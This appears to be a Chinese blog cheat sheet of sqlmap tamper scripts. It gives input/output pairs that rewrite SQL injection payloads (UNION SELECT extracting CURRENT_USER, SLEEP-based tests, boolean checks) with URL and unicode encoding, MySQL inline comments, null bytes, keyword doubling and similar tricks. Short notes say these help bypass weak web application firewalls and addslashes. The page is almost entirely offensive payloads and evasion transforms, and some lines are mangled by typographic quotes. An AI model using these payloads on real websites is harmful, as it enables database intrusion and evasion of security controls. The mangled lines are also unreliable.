Sqlmap Tamper大全
Default
|
1
2
|
("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
|
Default
|
1
2
|
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
|
Default
|
1
2
|
('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
|
Default
|
1
2
|
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
|
Default
|
1
2
|
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
Default
|
1
2
|
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
|
Default
|
1
2
|
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
|
Default
|
1
2
|
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
Default
|
1
2
|
('1 AND 1=1')
'1 AND 1=1%00'
|
Default
|
1
2
|
('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
|
Default
|
1
2
|
* Input: SELECT id FROM users
* Output: SELECT%08id%02FROM%0Fusers
|
Default
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# SOH 01 start of heading
# STX 02 start of text
# ETX 03 end of text
# EOT 04 end of transmission
# ENQ 05 enquiry
# ACK 06 acknowledge
# BEL 07 bell
# BS 08 backspace
# TAB 09 horizontal tab
# LF 0A new line
# VT 0B vertical TAB
# FF 0C new page
# CR 0D carriage return
# SO 0E shift out
# SI 0F shift in
|
Default
|
1
2
|
("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
|
Default
|
1
2
|
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
|
Default
|
1
2
|
('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
|
Default
|
1
2
|
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users
|
Default
|
1
2
3
4
5
6
|
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
# - A0 - (MySQL only)
|
Default
|
1
2
|
('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
|
Default
|
1
2
|
('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
|
Default
|
1
2
|
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
|
Default
|
1
2
|
('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
|
Default
|
1
2
|
('SELECT id FROM users')
'SELECT+id+FROM+users'
|
Default
|
1
2
|
('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
|
Default
|
1
2
|
('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
|
Default
|
1
2
|
('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
|
Default
|
1
2
|
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
|
Default
|
1
2
|
('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
|
Default
|
1
2
|
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
|
Default
|
1
2
|
('-1 UNION ALL SELECT')
'-1 UNION SELECT'
|
Default
|
1
2
|
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
|
- Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
- The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
Default
|
1
2
|
* Input: INSERT
* Output: InsERt
|
Default
|
1
2
|
* Input: 1′ AND 1=1
* Output: 1%bf%27 AND 1=1–%20
|
- Useful for bypassing magic_quotes/addslashes feature
Default
|
1
|
‘INSERT’ becomes ‘IN//S//ERT’
|
Default
|
1
2
|
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
|
Default
|
1
2
|
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
|
Requirement:
- Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
Default
|
1
2
|
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
|
Default
|
1
2
|
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
|
Default
|
1
2
|
* Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
|
- Useful to bypass weak and bespoke web application firewalls
Default
|
1
2
|
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
|
Sqlmap Tamper大全的更多相关文章
- Sqlmap Tamper大全(1)
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...
- SQLMap Tamper Scripts Update 04/July/2016
SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...
- sqlmap tamper脚本
本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...
- 安全工具推荐之sqlmap tamper&sqlmap api
我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...
- sqlmap Tamper脚本编写
sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...
- sqlmap参数大全
-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “”#指定数据库名-T “”#指定表名-C ...
- sqlmap tamper的使用
前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...
- sqlmap tamper下模块的使用
使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...
- sqlmap tamper编写
#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...
随机推荐
- jquery自定义插件-参数化配置多级菜单导航栏插件
1 自定义菜单导航栏插件的必要性 看图说话,下面是利用自定义的菜单导航栏插件simpleMenu创建的网站导航示例: 插件默认提供的是如上图的导航栏样式,即一二级菜单为横向分布:三四级菜单为纵向分布. ...
- Firefox 火狐 页面特殊符号乱码解决方法
这是由于字体问题导致的. 解决方法,参照下图设置,重点是红色标注区域.衬线字体务必选择兼容性最好的,比如思源黑体.宋体.
- poj1606 Jugs(BFS)
题目链接 http://poj.org/problem?id=1606 题意 有两个容量分别为ca,cb的杯子,可以向杯子里倒水,将杯子里的水倒空,将一个杯子里的水倒到另一个杯子里,求怎样倒才能使其中 ...
- 【转】Serializers 序列化组件
https://www.cnblogs.com/MayDayTime/p/9890582.html 为什么要用序列化组件 当我们做前后端分离的项目~~我们前后端交互一般都选择JSON数据格式,JSON ...
- db2部署与数据仓库应用
概念特性 安装 基础命令 连接 监控 存储过程 数据合并 Merge Into是增量备份 结果集分组 row_number() OVER (PARTITION BY COL1 ORDER BY COL ...
- shell kill session
ps -ef | grep java kill -9 pid
- 【LeetCode】shell
195. Tenth Line 输出file.txt中的第十行 答案: # Read from the file file.txt and output the tenth line to stdou ...
- ZXing.Net.Mobile无法识别较大的条码
ZXing.Net.Mobile无法识别较大的条码 在Xamarin项目中,使用ZXing.Net.Mobile实现条码扫描时,可能会出现无法顺利识别较大的条码,而可以正常识别较小的条码.这是由于ZX ...
- 阿里云提示Discuz memcache+ssrf GETSHELL漏洞如何解决
一般这个漏洞都是下面文件,source/function/function_core.php 搜索下面代码: $content = preg_replace($_G['setting']['outpu ...
- Linux中的mysql操作(2)
1.终端启动MySQL:/etc/init.d/mysql start: 2.登录MySQL:mysql –u root -p (用root账户登录),然后输入密码: 3.查看所有的数据库名字:sho ...